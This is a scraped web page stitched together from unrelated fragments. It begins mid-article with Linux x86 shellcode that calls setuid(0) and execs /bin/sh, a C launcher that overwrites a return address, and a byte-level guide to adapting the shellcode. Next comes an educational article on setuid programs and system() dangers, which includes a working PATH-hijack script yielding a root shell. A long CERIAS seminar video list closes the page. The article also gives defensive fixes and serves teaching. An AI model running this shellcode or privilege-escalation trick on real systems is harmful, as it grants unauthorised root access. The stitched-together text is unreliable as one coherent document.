  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;
      seteuid(getuid());
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }

Let’s check how it works :

$ su
Password:
# chown root.root shellcode6
# chmod +s shellcode6
# exit
$ ./shellcode6
bash# whoami
root
bash# exit
$

As shown in this last example, it’s possible to add functions to a shellcode, for instance, to leave the directory imposed by the chroot() function or to open a remote shell using a socket.

Such changes seem to imply you can adapt the value of some bytes in the shellcode according to their use :

eb XX <subroutine_call> XX = number of bytes to reach <subroutine_call>
<subroutine>:
5e popl %esi
89 76 XX movl %esi,XX(%esi) XX = position of the first item in the argument array (i.e. the command address). This offset is equal to the number of characters in the command, ” included.
31 c0 xorl %eax,%eax
89 46 XX movb %eax,XX(%esi) XX = position of the second item in the array, here, having a NULL value.
88 46 XX movb %al,XX(%esi) XX = position of the end of string ”.
b0 0b movb $0xb,%al
89 f3 movl %esi,%ebx
8d 4e XX leal XX(%esi),%ecx XX = offset to reach the first item in the argument array and to put it in the %ecx register
8d 56 XX leal XX(%esi),%edx XX = offset to reach the second item in the argument array and to put it in the %edx register
cd 80 int $0x80
31 db xorl %ebx,%ebx
89 d8 movl %ebx,%eax
40 incl %eax
cd 80 int $0x80
<subroutine_call>:
e8 XX XX XX XX call <subroutine> these 4 bytes correspond to the number of bytes to reach <subroutine> (negative number, written in little endian)

Conclusion

We wrote an approximately 40 byte long program and are able to run any external command as root. Our last examples show some ideas about how to smash a stack. More details on this mechanism in the next article…

Avoiding security holes when developing an application – Part 1


Abstract:

This article is the first one in a series about the main types of security holes in applications. We’ll show the ways to avoid them by changing your development habits a little.


Introduction

It doesn’t take more than two weeks before a major application which is part of most Linux distributions presents a security hole allowing, for instance, a local user to become root. Despite the great quality of most of this software, ensuring the security of a program is a hard job : it must not allow a bad guy to benefit illegally from system resources. The availability of application source code is a good thing, much appreciated by programmers, but the smallest defects in software become visible to everyone. Furthermore, the detection of such defects comes at random and the people finding them do not always have good intentions.

From the sysadmin side, daily work consists of reading the lists concerning security problems and immediately updating the involved packages. For a programmer it can be a good lesson to try out such security problems since avoiding security holes from the beginning is the preferred method of fixing them. We’ll try to define some “classic” dangerous behaviors and provide solutions to reduce the risks. We won’t talk about network security problems since they often stem from configuration mistakes (dangerous cgi-bin scripts, …) or from system bugs allowing DOS (Denial Of Service) type attacks to prevent a machine from listening to its own clients. These problems concern the sysadmin or the kernel developers. But the application programmer must also protect her code as soon as she takes into account external data. Some versions of pine, acroread, netscape,access,… have allowed elevated access or information leaks under some conditions. As a matter of fact secure programming is everyone’s concern.

This set of articles shows methods which can be used to damage a Unix system. We could only have mentioned them or said a few words about them, but we prefer complete explanations to make people understand the risks. Thus, when debugging a program or developing your own, you’ll be able to avoid or correct these mistakes. For each discussed hole, we will take the same approach. We’ll start detailing the way it works. Next, we will show how to avoid it. For every example we will use security holes still present in wide spread software.

This first article talks about the basics needed for understanding security holes, that is the notion of privileges and the Set-UID or Set-GID bit. Next, we analyse the holes based on the system()function, since they are easier to understand.

We will often use small C programs to illustrate what we are talking about. However, the approaches mentioned in these articles are applicable to other programming languages : perl, java, shell scripts… Some security holes depend on a language, but this is not true for all of them as we will see it with system().

Privileges

On a Unix system, users are not equals, neither are applications. The access to the file system nodes – and accordingly the machine peripherals – relies on a strict identity control. Some users are allowed to do sensitive operations to maintain the system in good condition. A number called UID (User Identifier) allows the identification. To make things easier, a user name corresponds to this number, the association is done in the /etc/passwd file.

The UID of 0, with default name of root, can access everything in the system. He can create, modify, remove every system node, but he can as well manage the physical configuration of the machine, mounting partitions, activating network interfaces and changing their configuration (IP address), or using system calls such as mlock() to act on physical memory, or sched_setscheduler() to change the order mechanism. In a future article we will study the Posix.1e features which allows limiting the privileges of an application executed as root, but for now, let’s assume the super-user can do everything on a machine.

The attacks we will mention are internal ones, that is an authorized user on a machine tries to gain privileges he doesn’t have. On the other hand, the network attacks are external ones, coming from people trying to connect to a machine they are not allowed on.

To use privileges reserved for another user without being able to log in under her identity, one must at least have the opportunity to talk to an application running under the victim’s UID. When an application – a process – runs under Linux, it has a well defined identity. First, a program has an attribute called RUID (Real UID) corresponding to the user ID who launched it. This data is managed by the kernel and usually can not change. A second attribute completes this information : the EUID field (Effective UID) corresponding to the identity the kernel takes into account when managing the access rights (opening files, reserved system-calls).

To get the privileges of another user means everything will be done under the UID of that user, and not under the proper UID. Of course, a cracker tries to get the root ID, but many other user accounts are of interest, either because they give access to system information (news,mail, lp…) or because they allow reading private data (mail, personal files, etc) or they can be used to hide illegal activities such as attacks on other sites.

To run an application with the privileges of an Effective UID different from its Real UID (the user who launched it) the executable file must have a specific bit turned on called Set-UID. This bit is found in the file permission attribute (like user’s execute, read, write bits, group members or others) and has the octal value of 4000. The Set-UID bit is represented with an s when displaying the rights with the ls command :

>> ls -l /bin/su
-rwsr-xr-x  1 root  root  14124 Aug 18  1999 /bin/su
>>

The command “find / -type f -perm +4000” displays a list of the system applications having their Set-UID bit set to 1. When the kernel runs an application with the Set-UID bit on, it uses the program owner’s identity as EUID for the process. On the other hand, the RUID doesn’t change and corresponds to the user who launched the program. For instance, every user can have access to the /bin/su command, but it runs under its owner’s identity (root) with every privilege on the system. Needless to say one must be very careful when writing a program with this attribute.

Each process also has an Effective group ID, EGID, and a real identifier RGID. The Set-GID bit (2000 in octal) in the access rights of an executable file, asks the kernel to use the owner’s group of the file as EGID and not the GID of the user who launched the program. A curious combination sometimes appears with the Set-GID set to 1 but without the group execute bit. As a matter of fact, it’s a convention having nothing to do with privileges related to applications, but indicating the file can be blocked with the function fcntl(fd, F_SETLK, lock). Usually an application doesn’t use the Set-GID bit, but it does happen sometimes. Some games, for instance, use it to save the best scores into a system directory.

Type of attacks and potential targets

There are various types of attacks against a system. Today we’ll study the mechanisms to execute an external command from within and application. This is usually a shell running under the identity of the owner of the application. A second type of attack relies on buffer overflowgiving the attacker the ability to run personal code instructions. Last, the third main type of attack is based on race condition – a lapse of time between two instructions in which a system component is changed (usually a file) while the application believes it remains the same.

The two first types of attacks often try to execute a shell with the application owner’s privileges, while the third one is targeted instead at getting write access to protected system files. Read access is sometimes considered a system security weakness (personal files, emails, password file /etc/shadow, and pseudo kernel configuration files in /proc).

The targets of security attacks are mostly the programs having a Set-UID (or Set-GID) bit on. However, this also effects every application running under a different ID than the one of its user. The system daemons represent a big part of these programs. A daemon is an application usually started at boot time, running in the background without any control terminal, and doing privileged work for any user. For instance, thelpd daemon allows every user to send documents to the printer, sendmail receives and redirects electronic mail, or apmd asks the Bios for the battery status of a laptop. Some daemons are in charge of communication with external users through the network (Ftp, Http, Telnet… services). A server called inetd manages the connections of many of these services.

We can then conclude that a program can be attacked as soon as it talks – even briefly – to a user different from the one who started it. While developing this type of application you must be careful to keep in mind the risks presented by the functions we will study here.

Changing privilege levels

When an application runs with an EUID different from its RUID, it’s to provide the user with privileges he needs but doesn’t have (file access, reserved system calls…). However these privileges are only needed for a very short time, for instance when opening a file, otherwise the application is able to run with its user’s privileges. It’s possible to temporarily change an application EUID with the system-call :

  int seteuid (uid_t uid);

A process can always change its EUID value giving it the one of its RUID. In that case, the old UID is kept in a saved field called SUID (Saved UID) different from SID (Session ID) used for control terminal management. It’s always possible to get the SUID back to use it as EUID. Of course, a program having a null EUID (root) can change at will both its EUID and RUID (it’s the way /bin/su works).

To reduce the risks of attacks, it’s suggested to change the EUID and use the RUID of the users instead. When a portion of code needs privileges corresponding to those of the file’s owner, it’s possible to put the Saved UID into the EUID. Here is an example :

  uid_t e_uid_initial;
  uid_t r_uid;

  int
  main (int argc, char * argv [])
  {
    /* Saves the different UIDs */
    e_uid_initial = geteuid ();
    r_uid = getuid ();

    /* limits access rights to the ones of the
     * user launching the program */
    seteuid (r_uid);
    ...
    privileged_function ();
    ...
  }

  void
  privileged_function (void)
  {
    /* Gets initial privileges back */
    seteuid (e_uid_initial);
    ...
    /* Portion needing privileges */
    ...
    /* Back to the rights of the runner */
    seteuid (r_uid);
  }

This method is much more secure than the unfortunately all to common one consisting of using the initial EUID and then temporarily reducing the privileges just before doing a “risky” operation. However this privilege reduction is useless against buffer-overflow attacks. As we’ll see in a next article, these attacks intend to ask the application to execute personal instructions and can contain the system-calls needed to make the privilege level higher. Nevertheless, this approach protects from external commands and from most race conditions.

Running external commands

An application often needs to call an external system service. A well known example concerns the mail command to manage an electronic mail (running report, alarm, statistics, etc) without requiring a complex dialog with the mail system. The easiest solution is to use the library function :

  int system (const char * command)

Dangers of the system() function

This function is rather dangerous : it calls the shell to execute the command given as an argument. The shell behavior depends on the choice of the user. A typical example comes from the PATH environment variable. Let’s look at an application calling the mail function. For instance, the following program sends its source code to the user who launched it :

/* system1.c */

#include <stdio.h>
#include <stdlib.h>

int
main (void)
{
  if (system ("mail $USER < system1.c") != 0)
    perror ("system");
  return (0);
}

Let’s say this program is Set-UID root :

>> cc system1.c -o system1
>> su
Password:
[root] chown root.root system1
[root] chmod +s system1
[root] exit
>> ls -l system1
-rwsrwsr-x  1 root  root  11831  Oct 16  17:25 system1
>>

To execute this program, the system runs a shell (with /bin/sh) and with the -c option, it tells it the instruction to invoke. Then the shell goes through the directory hierarchy according to the PATH environment variable to find an executable called mail. To compromise the program, the user only has to change this variable’s content before running the application. For example :

  >> export PATH=.
  >> ./system1

looks for the mail command only within the current directory. One need merely create an executable file (for instance, a script running a new shell) and name it mail and the program will then be executed with the main application owner’s EUID! Here, our script runs /bin/sh. However, since it’s executed with a redirected standard input (like the initial mail command), we must get it back in the terminal. We then create the script :

#! /bin/sh
# "mail" script running a shell
# getting its standard input back.
/bin/sh < /dev/tty

Here is the result :

>> export PATH="."
>> ./system1
bash# /usr/bin/whoami
  root
bash#

Of course, the first solution consists in giving the full path of the program, for instance /bin/mail. Then a new problem appears : the application relies on the system installation. If /bin/mail is usually available on every system, where is GhostScript, for instance? (is it in /usr/bin, /usr/share/bin,/usr/local/bin ?). On the other hand, another type of attack becomes possible with some old shells : the use of the environment variable IFS. The shell uses it to parse the words in the command line. This variable holds the separators. The defaults are the space, the tab and the return. If the user adds the slash /, the command “/bin/mail” is understood by the shell as “bin mail“. An executable file called bin in the current directory can be executed just by setting PATH, as we have seen before, and allows to run this program with the application EUID.

Under Linux, the IFS environment variable is not a problem anymore since bash and pdksh both complete it with the default characters on startup. But keeping application portability in mind you must be aware that some systems might be less secure regarding this variable.

Some other environment variables may cause unexpected problems. For instance, the mail application allows the user to run a command while composing a message using an escape sequence “~!“. If the user writes the string “~!command” at the beginning of the line, the command is run. The program /usr/bin/suidperl used to make perl scripts work with a Set-UID bit calls /bin/mail to send a message to root when it detects a problem. Since /bin/mail is Set-UID root, the call to /bin/mail is done with root’s privileges and contains the name of the faulty file. A user can then create a file whose name contains a carriage return followed by a ~!command sequence and another carriage return. If a perl script calling suidperl fails on a low-level problem related to this file, a message is sent under the root identity, containing the escape sequence from the mail application, and the command in the file name is executed with root’s privileges.

This problem shouldn’t exist since the mail program is not supposed to accept escape sequences when run automatically (not from a terminal). Unfortunately, an undocumented feature of this application (probably left from debugging), allows the escape sequences as soon as the environment variable interactive is set. The result? A security hole easily exploitable (and widely exploited) in an application supposed to improve system security. The blame is shared. First, /bin/mail holds an undocumented option especially dangerous since it allows code execution only checking the data sent, what should be a priori suspicious for a mail utility. Second, even if the /usr/bin/suidperl developers were not aware of the interactive variable, they shouldn’t have left the execution environment as it was when calling an external command, especially when writing this program Set-UID root.

As a matter of fact, Linux ignores the Set-UID and Set-GID bit when executing scripts (read /usr/src/linux/fs/binfmt_script.c and/usr/src/linux/fs/exec.c). But some tricks allow you to bypass this rule, like Perl does with its own scripts using /usr/bin/suidperl to take these bit into account.

Solutions

It isn’t always easy to find a replacement for the system() function. The first variant is to use system-calls such as execl() or execle(). However, it’ll be quite different since the external program is no longer called as a subroutine, instead the invoked command replaces the current process. You must fork the process and parse the command line arguments. Thus the program :

  if (system ("/bin/lpr -Plisting stats.txt") != 0) {
    perror ("Printing");
    return (-1);
  }

becomes :

pid_t pid;
int   status;

if ((pid = fork()) < 0) {
  perror("fork");
  return (-1);
}
if (pid == 0) {
  /* child process */
  execl ("/bin/lpr", "lpr", "-Plisting", "stats.txt", NULL);
  perror ("execl");
  exit (-1);
}
/* father process */
waitpid (pid, & status, 0);
if ((! WIFEXITED (status)) || (WEXITSTATUS (status) != 0)) {
  perror ("Printing");
  return (-1);
}

Obviously, the code gets heavier! In some situations, it becomes quite complex, for instance, when you must redirect the application standard input such as in :

system ("mail root < stat.txt");

That is, the redirection defined by < is done from the shell. You can do the same, using a complicated sequence such as fork(), open(), dup2(),execl(), etc. In that case, an acceptable solution would be using the system() function, but configuring the whole environment.

Under Linux, the environment variables are stored in the form of a pointer to a table of characters : char ** environ. This table ends with NULL. The strings are of the form “NAME=value“.

We start removing the environment using the Gnu extension :

    int clearenv (void);

or forcing the pointer

    extern char ** environ;

to take the NULL value. Next the important environment variables are initialized, using controlled values, with the functions :

    int setenv (const char * name, const char * value, int remove)
    int putenv(const char *string)

before calling the system() function. For example :

    clearenv ();
    setenv ("PATH", "/bin:/usr/bin:/usr/local/bin", 1);
    setenv ("IFS", " \t\n", 1);
    system ("mail root < /tmp/msg.txt");

If needed, you can save the content of some useful variables before removing the environment (HOME, LANG, TERM, TZ,etc.). The content, the form, the size of these variables must be strictly checked. It is important that you remove the whole environment before redefining the needed variables. The suidperl security hole wouldn’t have appeared if the environment were properly removed.

Analogues, protecting a machine on a network first implies denying every connection. Next, a sysadmin activates the required or useful services . In the same way, when programming a Set-UID application the environment must be cleared and then filled with required variables.

Verifying a parameter format is done by comparing the expected value to the allowed formats. If the comparison succeeds the parameter is validated. Otherwise, it is rejected. If you run the test using a list of invalid format values, the risk of leaving a malformed value increases and that can be a disaster for the system.

We must understand what is dangerous with system() is also dangerous for some derived functions such as popen(), or with system-calls such as execlp() or execvp() taking into account the PATH variable.

Indirect execution of commands

To improve a programs usability, it’s easy to leave the user the ability to configure most of the software behavior using macros, for instance. To manage variables or generic patterns as the shell does, there is a powerful function called wordexp(). You must be very careful with it, since sending a string like $(command) allows executing the mentioned external command. Giving it the string “$(/bin/sh)” creates a Set-UID shell. To avoid this, wordexp() has an attribute called WRDE_NOCMD that deactivates the interpretation of the $( ) sequence .

When invoking external commands you must be careful to not call a utility providing an escape mechanism to a shell (like the vi :!commandsequence). It’s difficult to list them all, some applications are obvious (text editors, file managers…) others are harder to detect (as we have seen with /bin/mail) or have dangerous debugging modes.

Conclusion

This article illustrates various aspects :

  • Everything external to a Set-UID root program must be validated! This means the environment variables as well as the parameters given to the program (command line, configuration file…);
  • Privileges have to be reduced as soon as the program starts and should only be increased very briefly and only when absolutely necessary;
  • The “depth of security” is essential : every protection decision programs make helps reduce the number of people who can compromise them.

The next article will talk about memory, its organization, and function calls before reaching the buffer overflows. We also will see how to build a shellcode.

CERIAS Security Seminar Archive Video Talks 2010-2011-2012-2013-2014-2015


01/14/2015

Learning from Information Security Maturity: A Textual Analysis

Learning from Information Security Maturity: A Textual Analysis

Jackie Rees Ulmer – Purdue University
(374.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/21/2015

Security with Privacy - A Research Agenda

Security with Privacy – A Research Agenda

Bharath Samanthula – Purdue University
(117.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/28/2015

Practical Confidentiality Preserving Big Data Analysis in Untrusted Clouds

Practical Confidentiality Preserving Big Data Analysis in Untrusted Clouds

Savvas Savvides – Purdue University
(148.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/04/2015

Regulatory Compliance Checking Over Encrypted Audit Logs

Regulatory Compliance Checking Over Encrypted Audit Logs

Omar Chowdhury – Purdue University
(149.6MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/11/2015

Code-Pointer Integrity

Code-Pointer Integrity

Mathias Payer – Purdue University
(90.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/18/2015

Privacy Notions for Data Publishing and Analysis

Privacy Notions for Data Publishing and Analysis

Ninghui Li – Purdue University
(216.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/25/2015

Software updates: decisions and security implications

Software updates: decisions and security implications

Kami Vaniea – Indiana University
(181.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/04/2015

Aiding Security Analytics -- From Dempster-Shafer Theory to Anthropology

Aiding Security Analytics — From Dempster-Shafer Theory to Anthropology

Xinming Ou – Kansas State University
(112.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/11/2015

Virtual Android Malware Detection and Analysis (VAMDA)

Virtual Android Malware Detection and Analysis (VAMDA)

Andrew Pyles – MITRE
(85.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/25/2015

Symposium/Michelle Dennedy, Intel

Symposium/Michelle Dennedy, Intel

Michelle Dennedy – Intel
(242.2MB): Video Icon MP4 Video   Flash Icon Flash Video

04/01/2015

Breaking Mobile Social Networks for Automated User Location Tracking

Breaking Mobile Social Networks for Automated User Location Tracking

Kui Ren – University at Buffalo
(109.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/15/2015

Engineering Secure Computation -- Efficiently

Engineering Secure Computation — Efficiently

Yan Huang – Indiana University
(107.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube


01/15/2014

Open

01/22/2014

Cancelled

01/29/2014

Secure and Private Outsourcing to Untrusted Cloud Servers

Secure and Private Outsourcing to Untrusted Cloud Servers

Shumiao Wang – Purdue University
(311.0MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

02/05/2014

Cancelled

02/19/2014

Technical Tradeoffs in the NSA's Mass Phone Call Program

Technical Tradeoffs in the NSA’s Mass Phone Call Program

Ed Felten – Princeton University
(155.3MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

03/05/2014

Machine Intelligence for Biometric and On-Line Security

Machine Intelligence for Biometric and On-Line Security

Marina Gavrilova – University of Calgary
(335.5MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

03/12/2014

General-Purpose Secure Computation and Outsourcing

General-Purpose Secure Computation and Outsourcing

Marina Blanton – University of Notre Dame
(299.6MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

04/02/2014

CERIAS Poster Contest Winners

CERIAS Poster Contest Winners

Philip Ritchey & Mohammed Almeshekah – Purdue University
(302.5MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

04/16/2014

Online Privacy Agreements, is it Informed Consent?

Online Privacy Agreements, is it Informed Consent?

Masooda Bashir – University of Illinois at Urbana-Champaign
(320.2MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

04/23/2014

Cancelled

04/30/2014

Women In Cyber Security

Women In Cyber Security

Rachel Sitarz – Purdue University
(313.2MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

08/27/2014

Tree-based Oblivious RAM and Applications

Elaine Shi – University of Maryland

09/10/2014

WarGames in Memory: Fighting Powerful Attackers

WarGames in Memory: Fighting Powerful Attackers

Mathias Payer – Purdue University
(102.4MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

09/24/2014

Threat intelligence and digital forensics

Threat intelligence and digital forensics

Sam Liles – Purdue University
(166.4MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

10/08/2014

Biometrics and Usability

Biometrics and Usability

Stephen Elliott – Purdue University
(164.9MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

10/15/2014

Canceled

10/22/2014

“Memory Analysis, Meet GPU Malware”

Golden G. Richard III – University of New Orleans
(170.0MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

10/29/2014

Healthcare Security and Privacy: Not There Yet

Healthcare Security and Privacy: Not There Yet

Robert Zimmerman – Inforistec
(206.1MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

11/05/2014

Improving Analyst Team Performance and Capability in NOC / SOC Operations Centers

Improving Analyst Team Performance and Capability in NOC / SOC Operations Centers

Barrett Caldwell and Omar Eldardiry – Purdue University
(145.2MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

11/19/2014

Privacy in the Age of the Police State

Privacy in the Age of the Police State

Marcus Ranum – Tenable Network Security
(209.0MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube

12/03/2014

Open

12/10/2014

How Program Analysis can be Used in Security Applications

How Program Analysis can be Used in Security Applications

Xiangyu Zhang – Purdue University
(148.5MB): Video Icon MP4 VideoFlash Icon Flash VideoWatch on Youtube


01/09/2013

Open

01/23/2013

Differentially Private Publishing of Geospatial Data

Differentially Private Publishing of Geospatial Data

Wahbeh Qardaji – Purdue University
(168.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/30/2013

A Semantic Baseline for Spam Filtering

A Semantic Baseline for Spam Filtering

Christian F. Hempelmann – Texas A&M University-Commerce
(264.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/06/2013

Using Probabilistic Generative Models for Ranking Risks of Android Apps

Using Probabilistic Generative Models for Ranking Risks of Android Apps

Chris Gates – Purdue University
(161.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/20/2013

Minimizing Private Data Disclosures in the Smart Grid

Minimizing Private Data Disclosures in the Smart Grid

Weining Yang – Purdue University
(104.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/27/2013

Protecting Today’s Enterprise Systems against Zero-day Attacks

Saurabh Bagchi – Purdue University

03/06/2013

Whole Genome Sequencing: Innovation Dream or Privacy Nightmare?

Whole Genome Sequencing: Innovation Dream or Privacy Nightmare?

Emiliano DeCristofaro – PARC
(148.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/20/2013

Active Cyber Network Defense with Denial and Deception

Active Cyber Network Defense with Denial and Deception

Kristin Heckman – MITRE
(170.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/27/2013

Regulatory Compliance Software Engineering

Regulatory Compliance Software Engineering

Aaron Massey – Georgia Tech
(125.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/03/2013

Symposium

04/17/2013

Towards Automated Problem Inference from Trouble Tickets

Towards Automated Problem Inference from Trouble Tickets

Rahul Potharaju – Purdue University
(165.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/24/2013

Identity-Based Internet Protocol Network

Identity-Based Internet Protocol Network

David Pisano – MITRE
(81.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

08/21/2013

New possibilities of steganography based on Kuznetsov-Tsybakov problem

New possibilities of steganography based on Kuznetsov-Tsybakov problem

Jarek Duda – Purdue University
(247.6MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

08/28/2013

Information Security Challenges in an Academic Environment

Information Security Challenges in an Academic Environment

Keith Watson – Purdue University
(294.2MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/11/2013

Cyber Threats and the Cyber Kill Chain

Kevin Brennan – FBI

09/18/2013

 Protecting a billion identities without losing (much) sleep

Protecting a billion identities without losing (much) sleep

Mark Crosbie, Tim Tickel, Four Flynn – Facebook
(269.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/02/2013

Open

10/09/2013

Open

10/16/2013

Open

10/23/2013

Systems of Systems: Opportunities and Challenges

Systems of Systems: Opportunities and Challenges

Daniel DeLaurentis – Purdue University
(317.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/30/2013

Membership Privacy: A Unifying Framework For Privacy Definitions

Membership Privacy: A Unifying Framework For Privacy Definitions

Ninghui Li – Purdue University
(316.2MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/06/2013

Yahoo! Messenger Forensics on Windows Vista and Windows 7

Yahoo! Messenger Forensics on Windows Vista and Windows 7

Tejashree Datar – Purdue University
(203.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/13/2013

Cloud Security: How Does Software Assurance Apply

Cloud Security: How Does Software Assurance Apply

Randall Brooks – Raytheon
(139.1MB): Video Icon MP4 Video   Flash Icon Flash Video

11/20/2013

Trust Management for Publishing Graph Data

Trust Management for Publishing Graph Data

Muhammad Umer Arshad – Purdue University
(359.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

12/04/2013

Economic Policy and Cyber Challenges in Estonia

Economic Policy and Cyber Challenges in Estonia

Marina Kaljurand
(549.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube


01/11/2012

“Introduction to Biometrics”

Stephen Elliott – Purdue University
(442.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/18/2012

 Secure Provenance Transmission for Data Streams

Secure Provenance Transmission for Data Streams

Salmin Sultana – Purdue University
(517.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/25/2012

A Flexible System for Access Control

A Flexible System for Access Control

Frank Tompa – University of Waterloo
(543.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/01/2012

Is it time to add Trust to the Future Internet/Web?

Is it time to add Trust to the Future Internet/Web?

George Vanecek – Futurewei Technologies
(547.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/15/2012

Forensic Carving of Network Packets with bulk_extractor and tcpflow

Forensic Carving of Network Packets with bulk_extractor and tcpflow

Simson Garfinkel – Naval Postgraduate School
(532.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/22/2012

Vulnerability Path and Assessment

Vulnerability Path and Assessment

Ben Calloni – Lockheed Martin
(537.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/29/2012

Cryptographic protocols in the era of cloud computing

Cryptographic protocols in the era of cloud computing

Nishanth Chandran – Microsoft Research
(552.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/07/2012

Privacy-Preserving Assessment of Location Data Trustworthiness

Privacy-Preserving Assessment of Location Data Trustworthiness

Chenyun Dai – Purdue University
(535.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/21/2012

Adding a Software Assurance Dimension to Supply Chain Practices

Adding a Software Assurance Dimension to Supply Chain Practices

Randall Brooks – Raytheon
(535.2MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/04/2012

J.R. Rao, IBM Research

J.R. Rao – IBM

04/11/2012

: K-Anonymity in Social Networks: A Clustering Approach

: K-Anonymity in Social Networks: A Clustering Approach

Traian Truta – Northern Kentucky University
(538.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/25/2012

A Practical Beginners' Guide to Differential Privacy

A Practical Beginners’ Guide to Differential Privacy

Christine Task – Purdue University
(530.0MB): Video Icon MP4 Video   Flash Icon Flash Video

08/22/2012

The New Frontier, Welcome the Cloud Brokers

The New Frontier, Welcome the Cloud Brokers

Scott Andersen – Lockheed Martin
(443.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

08/29/2012

Challenges for R&D in the Security Field

Challenges for R&D in the Security Field

Lewis Shepherd – Microsoft
(445.2MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/05/2012

The Inertia of Productivity

The Inertia of Productivity

Ed Lopez
(447.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/12/2012

Trends in cyber security consulting

Trends in cyber security consulting

Sharon Chand & Chad Whitman – Deloitte & Touche
(442.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/03/2012

 Defending Users Against Smartphone Apps: Techniques and Future Directions

Defending Users Against Smartphone Apps: Techniques and Future Directions

William Enck – North Carolina State University
(448.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/10/2012

Understanding Spam Economics

Understanding Spam Economics

Chris Kanich – University of Illinois at Chicago
(445.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/17/2012

The Boeing Company

The Boeing Company

Edmund Jones – Boeing
(443.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/31/2012

Risk perception of information security risks online

Risk perception of information security risks online

Vaibhav Garg – Indiana University
(446.6MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/07/2012

Publishing Microdata with a Robust Privacy Guarantee

Publishing Microdata with a Robust Privacy Guarantee

Jianneng Cao – Purdue University
(444.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/28/2012

A New Class of Buffer Overflow Attacks

A New Class of Buffer Overflow Attacks

Ashish Kundu – IBM
(316.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

12/05/2012

You are Anonymous!!! Then you must be Lucky

You are Anonymous!!! Then you must be Lucky

Bilal Shebaro – Purdue University
(220.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube


01/12/2011

Risk Perception and Trust in Cloud

Risk Perception and Trust in Cloud

Fariborz Farahmand – Purdue University
(444.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/19/2011

Retrofitting Legacy Code for Security

Retrofitting Legacy Code for Security

Somesh Jha – University of Wisconsin
